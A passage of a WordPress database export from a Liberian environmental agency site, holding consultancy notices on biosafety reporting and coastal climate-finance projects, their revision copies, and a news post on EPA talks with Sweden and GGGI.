use of living modified organisms resulting from modern Biotechnology that may have adverse effects on biological diversity (in Liberia), taking also into account human, animals and plants health.  The COP-MOP in decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a> (para 2) welcomed the reporting format for the national report on the implementation of the Protocol proposed by the Secretariat and requested Parties to use it for the preparation of their Fifth national reports, through a consultative process involving all relevant stakeholders. It also encouraged Parties to respond to all questions in the reporting format to facilitate the establishment of baselines for subsequent assessment and review of the effectiveness of the Protocol and also facilitate the monitoring of progress towards the implementation of the objectives identified in the Strategic Plan. Parties that encounter difficulty in completing and submitting their national report on time were encouraged to seek assistance from the Secretariat or the Compliance Committee, and/or make use of the roster of biosafety experts [BS V/14 paras 4 – 7}.  Parties also requested in decision 9/5 (para 8) for GEF support to the Fifth national reporting. As a response to the request to the GEF as a funding mechanism as captured in Decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-04-en.pdf\">9/4</a>, the Executive Secretary of the SCBD released a notification on support for the Fifth national reporting to the CBD Focal Points and National Focal Points for the Cartagena Protocol on Biosafety. According to decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a>, The Fifth regular national report is to be submitted to the Secretariat (Twelve months prior to the sixteenth meeting of the Conference of the Parties serving as the meeting of the Parties to the Protocol), in an official language of the United Nations through the BCH.  Parties are encouraged to respond to all questions in the reporting form. Complete information is required for the establishment of baseline data for the subsequent assessment and review processes of the Protocol as required for article 35 with guidance in BS VII/3 as well as the mid-term review of the progress in the implementation of the <a href=\"http://bch.cbd.int/protocol/decisions/?decisionID=12329\">Biosafety Strategic Plan 2011 – 2030</a> .\r\n\r\n<strong>Purpose/Objective</strong>\r\n<ol>\r\n 	<li>The Agreement sets Fifth the terms and conditions of the cooperation between The Parties for the execution of the project “Support to Preparation of the Fifth National Biosafety Reports to the Cartagena Protocol on Biosafety - AFRICA REGION” as set out in the Project document appended as Annex 1 and approved by the Global Environment Facility (GEF) Chief Executive Officer (CEO) in the letter dated 23 September 2025 appended as Annex 2. The details of the various activities under the project are as set out in Annex 1, the Toolkit for the execution of National Reporting on Biosafety.</li>\r\n 	<li>The main objective of the project is to assist GEF-Eligible Parties to the Cartagena Protocol on Biosafety to prepare and make timely submission of their Fifth National Report on measures that each party has taken to implement the Protocol in line with Article 33 of the Cartagena Protocol on Biosafety through an umbrella Regional Medium Size Project, due to be submitted on the Biosafety Clearing-House (BCH) website by the respective BCH National Focal Point or offline by the designated National Focal Points to the SCBD by email (<a href=\"mailto:secretariat@cbd.int\">secretariat@cbd.int</a>) for upload, on or before 28<sup>th</sup> February, 2026.</li>\r\n</ol>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Announcement-to-Recruit-Consultnats.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy : To prepare the Fourth National Biosafety Report of Liberia, CP4NR','','inherit','closed','closed','','5649-revision-v1','','','2025-12-03 13:10:07','2025-12-03 13:10:07','',5649,'https://ekmsliberia.info/?p=5652',0,'revision','',0),(5653,38,'2025-12-03 13:32:39','2025-12-03 13:32:39','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service (National Consultant) : Inclusive Finance Specialist Deliver Training on Climate Risk Management Financing','','publish','closed','closed','','contractual-service-national-consultant-inclusive-finance-specialist-deliver-training-on-climate-risk-management-financing','','','2025-12-03 13:32:39','2025-12-03 13:32:39','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5653',32,'ekms_bulletin','',0),(5654,38,'2025-12-03 13:29:24','2025-12-03 13:29:24','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to','Contractual Service (National Consultant) : Finance Specialist Deliver Training on Climate Risk Management Financing','','inherit','closed','closed','','5653-revision-v1','','','2025-12-03 13:29:24','2025-12-03 13:29:24','',5653,'https://ekmsliberia.info/?p=5654',0,'revision','',0),(5655,38,'2025-12-03 13:30:51','2025-12-03 13:30:51','','Contractual Service-Inclusive Finance Specialist','','inherit','open','closed','','contractual-service-inclusive-finance-specialist-2','','','2025-12-03 13:30:51','2025-12-03 13:30:51','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5656,38,'2025-12-03 13:32:39','2025-12-03 13:32:39','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>To build the knowledge and skills of financial institution representatives on assessing, managing, and financing climate-related risks.</li>\r\n 	<li>To align financial institution procedures with community needs and realities.</li>\r\n 	<li>To strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>To enhance financial literacy and awareness of climate financing at the community level.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Contractual Service (National Consultant) : Inclusive Finance Specialist Deliver Training on Climate Risk Management Financing','','inherit','closed','closed','','5653-revision-v1','','','2025-12-03 13:32:39','2025-12-03 13:32:39','',5653,'https://ekmsliberia.info/?p=5656',0,'revision','',0),(5657,38,'2025-12-03 13:54:34','2025-12-03 13:54:34','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n&nbsp;\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n</ul>\r\nRecommend strategies to improve access, inclusion, and utilization of financial services\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Final-Market-Stuties-National-Consultant-ToR.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant, Inclusive Finance Specialist: To Undertake market studies of the target communities','','publish','closed','closed','','national-consultant-inclusive-finance-specialist-to-undertake-market-studies-of-the-target-communities','','','2025-12-03 13:54:34','2025-12-03 13:54:34','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5657',31,'ekms_bulletin','',0),(5658,38,'2025-12-03 13:42:45','2025-12-03 13:42:45','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n&nbsp;\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n</ul>\r\nRecommend strategies to improve access, inclusion, and utilization of financial services\r\n\r\n&nbsp;\r\n\r\nClick to:','National Consultant, Inclusive Finance Specialist','','inherit','closed','closed','','5657-revision-v1','','','2025-12-03 13:42:45','2025-12-03 13:42:45','',5657,'https://ekmsliberia.info/?p=5658',0,'revision','',0),(5659,38,'2025-12-03 13:44:32','2025-12-03 13:44:32','','Final Market Stuties National Consultant ToR','','inherit','open','closed','','final-market-stuties-national-consultant-tor-2','','','2025-12-03 13:44:32','2025-12-03 13:44:32','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Final-Market-Stuties-National-Consultant-ToR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5660,38,'2025-12-03 13:53:24','2025-12-03 13:53:24','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n&nbsp;\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n</ul>\r\nRecommend strategies to improve access, inclusion, and utilization of financial services\r\n\r\n&nbsp;\r\n\r\nClick to:','National Consultant, Inclusive Finance Specialist: To Undertake market studies of the target communities','','inherit','closed','closed','','5657-revision-v1','','','2025-12-03 13:53:24','2025-12-03 13:53:24','',5657,'https://ekmsliberia.info/?p=5660',0,'revision','',0),(5661,38,'2025-12-03 13:54:34','2025-12-03 13:54:34','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies, and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of the GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n&nbsp;\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n</ul>\r\nRecommend strategies to improve access, inclusion, and utilization of financial services\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Final-Market-Stuties-National-Consultant-ToR.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant, Inclusive Finance Specialist: To Undertake market studies of the target communities','','inherit','closed','closed','','5657-revision-v1','','','2025-12-03 13:54:34','2025-12-03 13:54:34','',5657,'https://ekmsliberia.info/?p=5661',0,'revision','',0),(5662,38,'2025-12-03 14:08:51','2025-12-03 14:08:51','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – The Environmental Protection Agency of Liberia (EPA) on Tuesday hosted a high-level delegation from the Government of Sweden and the Global Green Growth Institute (GGGI) at its Mamba Point headquarters. Discussions, held in the Executive Conference Room, focused on advancing Liberia’s participation in the LIFT Climate Financing Initiative—a new global effort to mobilize climate finance for 12 African countries, with Liberia as the only West African country selected.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The LIFT Initiative aims to unlock large-scale, long-term financing for climate adaptation and mitigation, while accelerating green growth. It supports countries to develop bankable climate projects, strengthen institutional capacity, and attract international investment aligned with national priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5663,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-02-at-13.41.04-1024x682.jpeg\" alt=\"\" class=\"wp-image-5663\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, reaffirmed Liberia’s readiness to partner with global institutions to deliver measurable climate results. He underscored the EPA’s commitment to ensuring Liberia fully benefits from LIFT by advancing a pipeline of high-impact, investment-ready projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The delegation commended Liberia’s proactive engagement. A representative of the Swedish Government noted, “Liberia has demonstrated strong willingness to participate meaningfully in LIFT, and we are encouraged by the EPA’s leadership.” GGGI officials added that their mission is to identify capable national institutions to drive implementation, emphasizing that “Liberia stands out as a promising partner for effective climate finance delivery.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA will continue close coordination with Sweden, GGGI, and relevant national stakeholders to translate this collaboration into tangible investments that build resilience, cut emissions, and create green jobs across Liberia. Further updates will be provided as the partnership progresses.</p>\n<!-- /wp:paragraph -->','EPA Hosts Swedish Government and GGGI for High-Level Talks on LIFT Climate Finance Initiative','','publish','open','open','','epa-hosts-swedish-government-and-gggi-for-high-level-talks-on-lift-climate-finance-initiative','','','2025-12-03 14:08:53','2025-12-03 14:08:53','',0,'https://ekmsliberia.info/?p=5662',35,'post','',0),(5663,38,'2025-12-03 14:06:35','2025-12-03 14:06:35','','WhatsApp-Image-2025-12-02-at-13.41.04','','inherit','open','closed','','whatsapp-image-2025-12-02-at-13-41-04','','','2025-12-03 14:06:35','2025-12-03 14:06:35','',5662,'https://ekmsliberia.info/wp-content/uploads/2025/12/WhatsApp-Image-2025-12-02-at-13.41.04.jpeg',0,'attachment','image/jpeg',0),(5664,38,'2025-12-03 14:07:24','2025-12-03 14:07:24','','news2222','','inherit','open','closed','','news2222','','','2025-12-03 14:07:24','2025-12-03 14:07:24','',5662,'https://ekmsliberia.info/wp-content/uploads/2025/12/news2222.jpeg',0,'attachment','image/jpeg',0),(5665,38,'2025-12-03 14:08:51','2025-12-03 14:08:51','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – The Environmental Protection Agency of Liberia (EPA) on Tuesday hosted a high-level delegation from the Government of Sweden and the Global Green Growth Institute (GGGI) at its Mamba Point headquarters. Discussions, held in the Executive Conference Room, focused on advancing Liberia’s participation in the LIFT Climate Financing Initiative—a new global effort to mobilize climate finance for 12 African countries, with Liberia as the only West African country selected.</p>\n<!-- 